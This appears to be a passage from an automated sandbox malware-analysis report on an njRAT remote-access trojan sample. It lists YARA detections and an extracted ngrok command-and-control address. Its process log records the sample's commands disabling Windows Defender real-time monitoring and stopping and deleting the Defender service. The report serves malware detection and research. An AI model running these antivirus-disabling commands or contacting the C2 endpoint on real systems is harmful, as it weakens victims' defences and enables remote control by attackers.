                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 233
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d521639fcb428f-EWR
                                                                    2024-05-02 04:05:00 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:05:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:06:00:51
                                                                    Start date:02/05/2024
                                                                    Path:C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\G1lnGpOLK4.exe"
                                                                    Imagebase:0x960000
                                                                    File size:68'951 bytes
                                                                    MD5 hash:97D72EFBB1F6FEA3F158B136C330689D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                    • Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: RevengeRAT_Sep17, Description: Detects RevengeRAT malware, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: Andromeda_MalBot_Jun_1A, Description: Detects a malicious Worm Andromeda / RETADUP, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: Unknown_Malware_Sample_Jul17_2, Description: Detects unknown malware sample with pastebin RAW URL, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                    • Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:1
                                                                    Start time:06:00:56
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                    Imagebase:0x7ff76e190000
                                                                    File size:3'242'272 bytes
                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:3
                                                                    Start time:06:00:56
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2036,i,13697505174205213952,6185066048164698462,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                    Imagebase:0x7ff76e190000
                                                                    File size:3'242'272 bytes
                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:4
                                                                    Start time:06:00:58
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                    Imagebase:0x7ff727de0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:06:00:58
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:06:00:58
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:06:01:03
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd /c sc query windefend
                                                                    Imagebase:0x7ff727de0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:06:01:03
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:06:01:04
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:sc query windefend
                                                                    Imagebase:0x7ff653820000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:06:01:04
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd /c sc stop windefend
                                                                    Imagebase:0x7ff727de0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:06:01:04
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:06:01:04
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:sc stop windefend
                                                                    Imagebase:0x7ff653820000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:13
                                                                    Start time:06:01:04
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd /c sc delete windefend
                                                                    Imagebase:0x7ff727de0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:06:01:04
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                    Imagebase:0x7ff693ab0000
                                                                    File size:496'640 bytes
                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:15
                                                                    Start time:06:01:04
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:16
                                                                    Start time:06:01:04
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:sc delete windefend
                                                                    Imagebase:0x7ff653820000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Reset < >
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f5430d01484b49cd68b6626db75749e99aae3cb393c3d9398e6356f0b8c41afe
                                                                      • Instruction ID: ff517ce8e8331e8b417dc24ec5bbee9714682e660e59e0057a30f70da5452770
                                                                      • Opcode Fuzzy Hash: f5430d01484b49cd68b6626db75749e99aae3cb393c3d9398e6356f0b8c41afe
                                                                      • Instruction Fuzzy Hash: 43D23270A096CD8FDBA6EF28C864BE87BE1FF5A340F4501A6D44DCB2A2DE345A45C711
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d0c5940a1878e23c107654b33c26e7caf890b36247d55f34db537b2872e4123
                                                                      • Instruction ID: 60bb7c86f4368a4e62632d502c783e99556a6b4ad7977b1608df30e66c53910c
                                                                      • Opcode Fuzzy Hash: 7d0c5940a1878e23c107654b33c26e7caf890b36247d55f34db537b2872e4123
                                                                      • Instruction Fuzzy Hash: 0E822370A196CD8FDBAAEF28C864BD87BE1FF5A340F4501A6D44DCB2A6DE345A40C711
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 90f5afbfc9f3a30b2a4a489bcc88e5576fa598d818e01efe1c1382a68b32ceeb
                                                                      • Instruction ID: 19fbbeb880a1342b5c616b3bcd77355015d7bd8fc5f14ba1a87301b3d73736cd
                                                                      • Opcode Fuzzy Hash: 90f5afbfc9f3a30b2a4a489bcc88e5576fa598d818e01efe1c1382a68b32ceeb
                                                                      • Instruction Fuzzy Hash: 4102282172D64B4FF72DAB6888626B537D0EF49319F1908BDE4CAC71E3E91CE5068711
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4651637b6dc72894dd062b747177e54082ad52cac06a1b3ac7439bad31db98ea
                                                                      • Instruction ID: 9039d63de369f58911817cd851b08637de6ab6444cc0d0ad873827e5d5f01a62
                                                                      • Opcode Fuzzy Hash: 4651637b6dc72894dd062b747177e54082ad52cac06a1b3ac7439bad31db98ea
                                                                      • Instruction Fuzzy Hash: 1DE1C32171D68A4FD76A9B7888657B53BE0EF4A300F0A05FAE48ACB1E3DE189D058751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4c78a43d9dcfe5d46c1160e48acd4bf25fc9a1c47a886eccb57afd13b96dcd98
                                                                      • Instruction ID: a0effe64ca04bc4a98c0ac4113b62c434ac05e44c83930504cafafc9fce8490a
                                                                      • Opcode Fuzzy Hash: 4c78a43d9dcfe5d46c1160e48acd4bf25fc9a1c47a886eccb57afd13b96dcd98
                                                                      • Instruction Fuzzy Hash: F342F3706196CD8FEBA6EF2CC854BD83BE1FF1A340F4501A6D85CCB2A6DA749A44C711
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3d0eb412acd590fb4146876753d1f51c381b86cc69011ee2fa9676e388c8d0f7
                                                                      • Instruction ID: ecc3d0778444fb3c25a32bea16cdecad91b636bcb659a53f6cfafa8b55ea2eff
                                                                      • Opcode Fuzzy Hash: 3d0eb412acd590fb4146876753d1f51c381b86cc69011ee2fa9676e388c8d0f7
                                                                      • Instruction Fuzzy Hash: 4ED1C521B1EA8A4FEB9BA76844647787BD1EF5A300F4601F9D45DCB2E7DE28AC448301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fcb2d3e4637d2f3ce9ff580edc9208c98e6179538fb15c8d956f02e711dffc1f
                                                                      • Instruction ID: 13da000d207200a3a5210b4bc68c9127dbc4b37a130c2b2e2e23d2c3b1db433c
                                                                      • Opcode Fuzzy Hash: fcb2d3e4637d2f3ce9ff580edc9208c98e6179538fb15c8d956f02e711dffc1f
                                                                      • Instruction Fuzzy Hash: C9E17770A096CD8FEBA5EF68C854BE83BE1FF19340F5501A6E84CCB2A2DB349944C751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6453115031fd5bb141d27f9f35adffedf89545e5d435720042742c656275efd3
                                                                      • Instruction ID: 58b1382454c3ef0205702c1c23047aff94b6d234f85da7a64d394679999b812c
                                                                      • Opcode Fuzzy Hash: 6453115031fd5bb141d27f9f35adffedf89545e5d435720042742c656275efd3
                                                                      • Instruction Fuzzy Hash: A6C19211B1E78A0FE746EB2888717687BE2EF4A344F5505FAE05DC72E7DE286D048341
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ce474a88684b5b67bd8694ff3f2d5914df39a3609c20417e8e532b027700ac89
                                                                      • Instruction ID: c32dea575883240df4fc9aa70099aad7b20590f5f5ca0a82fd65410c64daeda2
                                                                      • Opcode Fuzzy Hash: ce474a88684b5b67bd8694ff3f2d5914df39a3609c20417e8e532b027700ac89
                                                                      • Instruction Fuzzy Hash: FBB1B461B0E68A4FE79BAB6844347787BE1EF0A310F4601F9D45DCB2E7DE18AD448352
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e8a56d55af906000fdc138cb7c3aabe8a816eeb3f623363fae6abbccc4bcab34
                                                                      • Instruction ID: 20788228acb4a0b6216adcf0f2f777084cbcfd40d4631e26f79895baa3a1deef
                                                                      • Opcode Fuzzy Hash: e8a56d55af906000fdc138cb7c3aabe8a816eeb3f623363fae6abbccc4bcab34
                                                                      • Instruction Fuzzy Hash: EAB1896060E7CE5FE7AA9F6484747F93BD0AF0A300F5900FAE44DCB1A3DA689A44C751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 290848c9955875e7d3670db6b12ded9786b8c5c2ca70c6318220550326a06d32
                                                                      • Instruction ID: f04968c35144f8017b6d14436f5d107ecc25520c5cc63268bcf5db3e9063558c
                                                                      • Opcode Fuzzy Hash: 290848c9955875e7d3670db6b12ded9786b8c5c2ca70c6318220550326a06d32
                                                                      • Instruction Fuzzy Hash: 65911D60A0E7C94FE756EB648464BB87FE1EF4A304F4A41FAD04DCB1E3DA289904C751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b3f5e9fc47eb89c6bc38452760e9982a960b3935786a16b03f11fca803764912
                                                                      • Instruction ID: 6ed50e85a5aa86e9694e55967cdfc52ed06ce2b0fc22297af50f62c2d2c0eacf
                                                                      • Opcode Fuzzy Hash: b3f5e9fc47eb89c6bc38452760e9982a960b3935786a16b03f11fca803764912
                                                                      • Instruction Fuzzy Hash: 3871073071C50A4FEBA9AB6C849AAB833D1EF5C311F0A05B9D44EC71A2DE18EC069351
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d3887e79ed8d7d0a83cf4d118465ae5befd433c086c4121f89fc0645b36dbc4
                                                                      • Instruction ID: b14f7c2d03284d4226e49e9353d8d95b9740b5d0a7f9d0ba6138aa85b192c830
                                                                      • Opcode Fuzzy Hash: 7d3887e79ed8d7d0a83cf4d118465ae5befd433c086c4121f89fc0645b36dbc4
                                                                      • Instruction Fuzzy Hash: 1A51D721B0D64A0FE75EAB749861AB977D1EF49300F5200BAE45EC72E7DE28AD058352
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0b3eb70f29ce861d63ad1ce25e25302d50035a7049173031ca4f6c9233b4b988
                                                                      • Instruction ID: 06bcb43655d6aac173c7306138afa2bc9adfe00ef7895e9ed75105dac6e515fc
                                                                      • Opcode Fuzzy Hash: 0b3eb70f29ce861d63ad1ce25e25302d50035a7049173031ca4f6c9233b4b988
                                                                      • Instruction Fuzzy Hash: 90516292F1E7C91FE797E77818716646BE2AF5620474A05E7D098CB1F7E91858088322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7520506bacbba345fbc0a619eab082e26a10cb7b99d41a2dc1b3159974419741
                                                                      • Instruction ID: 5365deeeb20c7468aa5ec6624eb13c6f2ae98ef6e216fa50cac1db5d42b56af5
                                                                      • Opcode Fuzzy Hash: 7520506bacbba345fbc0a619eab082e26a10cb7b99d41a2dc1b3159974419741
                                                                      • Instruction Fuzzy Hash: AA41D370609A8D4FDBA9EF688855BE93BE0FF49304F5440AEE44DC7293DE389A48C741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 57d4e164625baa2b91ad7cb9be1eb4287ddc9e802c6a3f93abc36819a833b8d0
                                                                      • Instruction ID: 5fe3199d1e1a692e98cf33ed8f4f97ef7c97a227676340cc36f8408e8f14d58d
                                                                      • Opcode Fuzzy Hash: 57d4e164625baa2b91ad7cb9be1eb4287ddc9e802c6a3f93abc36819a833b8d0
                                                                      • Instruction Fuzzy Hash: 70412671A0D78D5FEB95AF6888667EA7BE0FF49304F0501AAE448C71A3DB3859058782
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b882b53b8338299880ce6952f279072a27d727a39c4141dc01d8fbcf396aa307
                                                                      • Instruction ID: 9e1aa11cab10fc2bb32473221eef74030d834515884d5d59103324dea87b7ef7
                                                                      • Opcode Fuzzy Hash: b882b53b8338299880ce6952f279072a27d727a39c4141dc01d8fbcf396aa307
                                                                      • Instruction Fuzzy Hash: 2031EA1070D7C84FE747D7389865BA43FE1DF4B244F4A40EBD489CB1A3DA289949C3A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 69cc24b2238f5656e2a771e6dc8763db1f415626df5369333de427d361cb6946
                                                                      • Instruction ID: fe138354f41967faccfb8672017d84aa7f9f1cf4f1570bd22bd797ee37abbbb9
                                                                      • Opcode Fuzzy Hash: 69cc24b2238f5656e2a771e6dc8763db1f415626df5369333de427d361cb6946
